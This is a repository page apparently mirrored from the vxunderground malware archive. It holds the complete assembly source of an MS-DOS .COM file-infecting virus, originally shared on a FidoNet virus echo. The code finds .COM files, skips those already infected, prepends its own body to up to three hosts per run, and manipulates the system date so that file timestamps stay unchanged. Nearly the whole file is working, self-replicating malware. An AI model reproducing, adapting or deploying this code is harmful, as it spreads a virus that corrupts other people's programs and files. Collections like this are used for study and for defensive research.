ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
364cc2fc1a
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir12.asm
vxunderground 6bf46a48b9
Add files via upload
2021-01-12 18:04:54 -06:00

217 lines
4.6 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 2 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
;To : - *.* - Fri 11 Nov 94 08:10
; Subj : BLJEC_8A.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:16)
;* To : Brad Frazee
;* Subj : BLJEC_8A.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
mov al,3 ; inf. only 3 file
mov count,al
mov ah,2ah
int 21h
mov ds:[0f2h],dx ;
mov ds:[0f4h],cx ; save system date
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
mov ax,'OC' ; "CO"
sub ax,ds:[009eh]
jne cont0 ; if file name CO*.com then skip
jmp fin
cont0:
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
jna cont2
jmp fin
cont2:
mov cx,ds:[98h]
and cx,001fh
mov dl,cl
mov ax,ds:[98h]
and ax,01e0h
mov cl,5
sar ax,cl
mov dh,al
mov ax,ds:[98h]
and ax,0fe00h
mov cl,9
sar ax,cl
mov cx,ax
add cx,1980
mov ah,2bh
int 21h ; set system time
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
mov al,'M'
mov di,dx
mov cx,ds:[0fch]
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
dec count
jz done
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov dx,ds:[0f2h]
mov cx,ds:[0f4h]
mov ah,2bh
int 21h
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk
;
;-+- FMail 0.96â
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/e Ignore Extended Dictionary
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
Reference in New Issue View Git Blame Copy Permalink